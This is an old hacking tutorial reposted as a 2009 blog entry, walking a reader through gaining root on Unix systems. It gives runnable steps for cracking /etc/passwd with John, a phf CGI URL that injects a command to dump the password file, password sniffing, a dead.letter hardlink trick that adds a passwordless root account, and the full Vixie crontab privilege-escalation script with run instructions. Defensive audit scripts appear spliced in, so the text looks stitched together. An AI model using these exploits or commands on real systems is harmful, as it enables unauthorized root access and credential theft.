Tuesday, June 2, 2009

Local exploits and older techniques

==============================Hacking Tutorial=================================
-------------------This is really a SCRIPT KIDDIE tutorial---------------------
===============================================================================

All attempts to break into another computer are illegal, I am NOT responsible
if anyone is so stupid that they try to steal data or break into another
computer after reading this.

This file contains information on how a 'hacker' does that, and should be
read as informative reading to learn how to protect oneself from 'hackers'.

===============================================================================



Here we go, with a hacking tutorial .... I know many who probably don't want
me to write this, because it will take a lot of the magic away from hacking
for those who look up to hackers .......
I will try to explain this as simply as possible, so that even the most
lame windows user *could* break into something by reading this tutorial.

To REALLY understand this file you got to know the basics of UNIX.
But I'll try to write it in mostly 'cut and paste' examples with
explanations.

The main reason I'm writing this is because I firmly believe that the
more people who know how to break security, the more people there will be
who know how to build security.

And another reason is that most hacking tutorials or texts I've seen contain
little or no `hacking` at all, they are just brief UNIX command texts
made by people who think that "file" is spelt "phile" or that "hacker" is
spelt "hax0r" or some lame crap like that, most likely they can't hack their
way out of a closet.

So if you feel the unstoppable urge to be taken for a lamer or to be
laughed at, spell words all wrong on purpose.

I'm not writing this to make even more lamers call themselves hackers,
I'm making it to show that any lamer can download a pre-made exploit
and use it ... and how easy it really is to break computer security.

One thing with hacking is that you can NOT go around and call yourself a hacker
if you're a windows user, you will only make an ass out of yourself.
One can do some simple hacking from windows such as exploiting cgi/phf holes,
or telnetting to UNIX systems and working from them.
But to do REAL hacking you need to have your own Linux or UNIX system
to have the control over it that you need, and most of all to really learn it.

In this tutorial I will NOT take up anything about BO (Back Orifice; made by
the Cult of the Dead Cow) or netbus (originally 'nat bus', made by a Swedish
programmer), because neither of them is even remotely hacking.
They are attempts at backdoors, and have nothing to do with
either hacking or viruses, as some computer-illiterate people think.

And one more thing: to break into a system has nothing to do with REAL hacking.
REAL hacking is to reverse engineer a program, find a vulnerability and code
something that may exploit it, or fix it; that's the hacking part of it.
The actual use of the exploits which I will show in this tutorial
has nothing to do with the real term hacking, this is just to illustrate
how easy it is to break into computers.
The name of this tutorial is hacking.tutor because more script kiddies
will read it by that name and may come to realize that they are not hackers,
which would make me happy.

===============================================================================
1 - Older techniques & Local Exploits.
===============================================================================

There are several ways of hacking, but they all have one thing in common: to
exploit a bug or weakness in a system or a program to make it do something
you're normally not allowed to do, or to gain the info you need from a place
to do the same.

The oldest and most well-known way to gain root (superuser) access is by
cracking the root password in the /etc/passwd file.

If you already have a shell account on a *nix (any sort of unix/linux) computer
you can do as follows to gain root access (except in the cases I'll state
after this):
-------------------------------------------------------------------------------

First get a password bruteforcing program such as john-1.6, you can get that
at almost any place where they have *nix hacking utilities.

Just use 'lynx' from the command line as "lynx http://www.metacrawler.com"
to get to a search engine .... search and download it...

unpack it: tar -zvxf john-1.6.tar.gz ('tar -zvxf' for all files ending
with '.tar.gz' or '.tgz')

After that you do this:

[user@localhost user]$ cd john-1.6/run/
[user@localhost run]$ cat /etc/passwd | grep root > tmp.pass
[user@localhost run]$ ./john -wordfile:password.lst tmp.pass
Loaded 1 password (FreeBSD MD5 [32/32])
monopoly (root)
guesses: 1 time: 0:00:10:02 100% c/s: 1057 trying: monopoly
[user@localhost run]$ su root
Password:
[root@localhost run]#

And *boom* you are root .... you might want to get a bigger word dictionary than
the default 'password.lst' that comes with john, so if you can't crack the
password, search for a bigger dictionary file.

Where this method doesn't work is when the computer has a 'shadow' password
file; if so you will only be able to see an 'x' where the encrypted password
would have been, like this:

/etc/passwd (when there is no shadow file)
root:k5cunkPfiKy/Y:0:0:root:/root:/bin/bash

/etc/passwd (when there is a shadow file)
root:x:0:0:root:/root:/bin/bash

If you don't have a user account or if the computer has a shadowed passwd
file, you move on to the next methods.

-------------------------------------------------------------------------------

If you don't have a shell you might want to try to get the password file with
the VERY old phf trick .... this is one of the oldest tricks in the book,
and it only works on very old systems (as far as I know only on NCSA
web servers, but it might work on some other old web servers too).

To use the phf trick you need any web browser, in this example I'll use lynx.

[user@localhost user]$ lynx http://www.the-host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

And if that works it will display the password file to you...
The 'www.the-host.com' part is where you type the IP or hostname of the
computer you want to get the password file from.

And if you get it displayed: highlight as many lines as you can and paste
them into a file, then use John-1.6 or similar to crack the passwords.

Then telnet to the computer using a non-root account and su to root once
you're in.
Most systems will not allow you to telnet to them as root; that's why you
need a user account and then 'su' (Substitute User / Super User) to root.

-------------------------------------------------------------------------------
note: Some think that 'su' means "switch user" .... it doesn't.
The manual pages tell that it means Substitute User and the UNIX admin bible
says Super User ...
-------------------------------------------------------------------------------
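On the web-server side the phf trick leaves a clear trace in the access log. Here is an added example (not the tutorial's code) that scans a Common Log Format log for phf requests carrying an encoded newline (%0a), the character that smuggles the command; the only path it assumes is /cgi-bin/phf from the text, and the log lines in its usage are constructed.

```sh
#!/bin/sh
# Print "client-ip request-line" for every request to the phf CGI whose
# query string carries an encoded newline (%0a or %0A), the marker of the
# phf trick. Input is an Apache-style Common Log Format access log.
phf_hits() {
    awk '
        {
            s = index($0, "\"")            # request line is the first quoted field
            if (s == 0) next
            req = substr($0, s + 1)
            e = index(req, "\"")
            req = substr(req, 1, e - 1)
            lreq = tolower(req)            # catch %0A as well as %0a
            if (lreq ~ /\/cgi-bin\/phf/ && lreq ~ /%0a/) print $1 " " req
        }
    ' "$1"
}

# Usage: phf_hits.sh /var/log/httpd/access_log
if [ "$#" -eq 1 ]; then
    phf_hits "$1"
fi
```

A phf request without %0a (a legitimate directory lookup) is not reported, so the output is the list of hosts that tried the command-injection form.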

If you are on the same internal network (or LAN with the same class C IP) as the
computer you want to hack you can use a sniffer to sniff passwords and so on.

Good sniffers are sniffit, linsniff666 and linsniffer ... there is some
version of sniffit for Windows but I heard it sucks.

Get any of them, if they come in a '.c' file you need to compile it.
And to do that you do this:

[user@localhost user]$ gcc linsniff666.c -o linsniff666
(or: gcc -o linsniff666 linsniff666.c ---- really the same thing)
After that you do this:
[user@localhost user]$ ./linsniff666 &
[1] 24271
eth0: Setting promiscuous mode.
[user@localhost user]$

All that linsniff666 sniffs will be logged to a file called 'tcp.log'.
To view it as it happens you can do this:

[user@localhost user]$ tail -f tcp.log
============================================================
Time: Tue Nov 16 01:29:27 Size: 44
Path: d212-151-231-70.swipnet.se => mail.swipnet.se [110]
------------------------------------------------------------
USER asd655a4
PASS 1ds8976as
STAT
QUIT

============================================================
Time: Tue Nov 16 01:29:07 Size: 32
Path: d212-151-231-73.swipnet.se => ftp.sunet.se [21]
------------------------------------------------------------

============================================================
Time: Tue Nov 16 01:29:07 Size: 32
Path: d212-151-231-73.swipnet.se => ftp.sunet.se [21]
------------------------------------------------------------

Then 'Ctrl+C' to get out from the listing.

To shut linsniff666 off you do this:

[user@localhost user]$ killall -15 linsniff666

As simple as that.

And yes this log is fabricated, so the passwords are fake =)

Always read the manuals if there are any.

-------------------------------------------------------------------------------

But more about remote hacking later, for now let's stick to local exploits.

-------------------------------------------------------------------------------

Here is a VERY old example of an exploit that doesn't work on any newer system
as far as I know.

[user@localhost user]$ ln /etc/passwd /var/spool/mail/dead.letter
[user@localhost user]$ echo "abc::0:0:root:/root:/bin/bash" | mail a@bogus.a
[user@localhost user]$ su - abc
Password: <<===== here just press enter.
[abc@localhost root]#

Here we have hard linked "dead.letter" (the place where mails go if the
destination address can't be found) to /etc/passwd; that means that
all that comes into dead.letter also goes to /etc/passwd, and since
Sendmail operates as root, it has write rights to /etc/passwd.

Then we mail a password-less root (uid/gid 0) to a mail address that doesn't
exist.

And after that we 'su' to that root user.

Now this bug was fixed a long time ago, and those systems that still
might have it have their /var directory on a separate HD partition,
and 'ln' can't hard link files that are on different partitions.

But this still gives you an idea of how an exploit might work.
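Both the password-cracking section above and the dead.letter trick leave something an administrator can check for in /etc/passwd: a crackable hash sitting in the world-readable file, and a password-less uid 0 entry. This added example (not the tutorial's code) audits a passwd-format file for both and reports the file's hard link count; it assumes GNU stat with a BSD stat fallback, and the passwd lines in its usage are constructed.

```sh
#!/bin/sh
# Print one finding per line for a passwd-format file:
#   UNSHADOWED_HASH  a real hash in field 2 (crackable with a wordlist)
#   EMPTY_PASSWORD   an empty field 2 (login with just Enter)
#   EXTRA_UID0       a uid 0 account that is not root
audit_passwd() {
    awk -F: '
        NF < 7 { next }                                   # not a passwd entry
        $2 == "" { print "EMPTY_PASSWORD " $1 }
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            print "UNSHADOWED_HASH " $1
        }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
    ' "$1"
}

# Hard link count of a file. /etc/passwd should report 1; anything higher
# means another path (such as a mail spool file) writes straight into it.
link_count() {
    stat -c %h "$1" 2>/dev/null || stat -f %l "$1"
}

passwd_hardlinked() {
    [ "$(link_count "$1")" -gt 1 ]
}

# Usage: passwd_audit.sh /etc/passwd
if [ "$#" -eq 1 ]; then
    audit_passwd "$1"
    passwd_hardlinked "$1" && echo "HARDLINKED $1 (link count $(link_count "$1"))"
fi
```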

-------------------------------------------------------------------------------

Now I'll take one more local exploit example, this one still works.
As far as I know it works on RedHat up to version 6.0 and S.u.S.E.
on versions up to 6.2, I haven't heard anything about other Linux distros
but it might work on a lot of distros that use crontab 3.0.1.

===============================================================================
Here follows the exploit source code exactly as I got it from bugtraq.
===============================================================================

Subject: Vixie Crontab exploit code
To: BUGTRAQ@SECURITYFOCUS.COM

Vixie Crontab exploit code

begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh

# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH

echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo

echo make shell
echo
cat > /tmp/sh.c << EOF
#include
#include
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c

echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh

echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=/usr/bin/procmail/P=/tmp/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3

echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile

echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait

echo execute shell
echo
/tmp/sh

echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex

--

Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

===============================================================================
Note: I think this code is made bigger than it has to be on purpose.
It can be done about half as big.
===============================================================================

To make this work:
Cut away what comes before "#!/bin/sh" and after "crontab /dev/null", name
it something like crontab_exploit.sh and do "chmod a+x crontab_exploit.sh".

then ./crontab_exploit.sh ...... as this following example:

-------------------------------------------------------------------------------

[user@localhost user]$ ./crontab_exploit.sh
make shell

compile shell

/usr/bin/ld: cannot open output file /tmp/sh: Permission denied
collect2: ld returned 1 exit status
/usr/bin/ld: cannot open output file /tmp/sh: Permission denied
collect2: ld returned 1 exit status

make execute shell script

hack sendmail.cf

make cron file

input cron file

wait for 1 minute

execute shell

bash# whoami
root
bash# exit
delete data files
[user@localhost user]$

-------------------------------------------------------------------------------

make shell <<== makes a .c file that will setuid & setgid 0.

compile shell <<== does what it says, here it compiles the .c file.

make execute shell script <<== makes a script that changes owner & group of
the compiled .c file to root and sets the setuid bit on it.

hack sendmail.cf <<== here it changes the "DefaultUser" in a copy of sendmail's
config file to root, and changes /usr/bin/procmail to
the script I just mentioned.

make cron file <<== here it makes a file that will mail some crontab stuff
using the new sendmail.cf copy.

input cron file <<== installs the cron file, so cron will use the sendmail.cf copy.

wait for 1 minute <<== does exactly that, and then executes the newly made
root shell.

The "bash#" is the root 'sh' prompt.

A 'whoami' to check if we really are 'root', and exit to go back to
normal user mode again, and note that when we exit to user again, it
deletes the temporary exploit files.
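The two things an administrator can look for after reading the walkthrough above are a MAILTO value that cron 3.0.1 would pass to sendmail as a command-line option, and a setuid binary left in a world-writable directory. This added example (not the tutorial's or the exploit author's code) checks both; it assumes POSIX awk and find, and the crontab lines in its usage are constructed.

```sh
#!/bin/sh
# 1. cron 3.0.1 put the MAILTO value straight onto sendmail's command line,
#    so a value that looks like an option ("-C<file>") or contains
#    whitespace is exactly what the trick needs. Print every such line.
suspicious_mailto() {
    awk '
        /^[ \t]*MAILTO[ \t]*=/ {
            val = $0
            sub(/^[ \t]*MAILTO[ \t]*=[ \t]*/, "", val)
            gsub(/^"|"$/, "", val)          # crontab allows a quoted value
            if (val ~ /^-/ || val ~ /[ \t]/) print "SUSPICIOUS_MAILTO " val
        }
    ' "$1"
}

# 2. The payload is a setuid shell dropped in /tmp. List every regular
#    file with the setuid bit under the given directory.
setuid_files() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Usage: crontab_audit.sh <crontab-file> <directory>
if [ "$#" -eq 2 ]; then
    suspicious_mailto "$1"
    setuid_files "$2"
fi
```

Run it over every file under the cron spool directory and over /tmp; a normal MAILTO holds only a mailbox name or address, so any hit is worth a look.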

-------------------------------------------------------------------------------

Most of the older techniques still apply to this day, because of the way
an operating system is built.
But enough of that for now, let's move on to remote exploits and such.
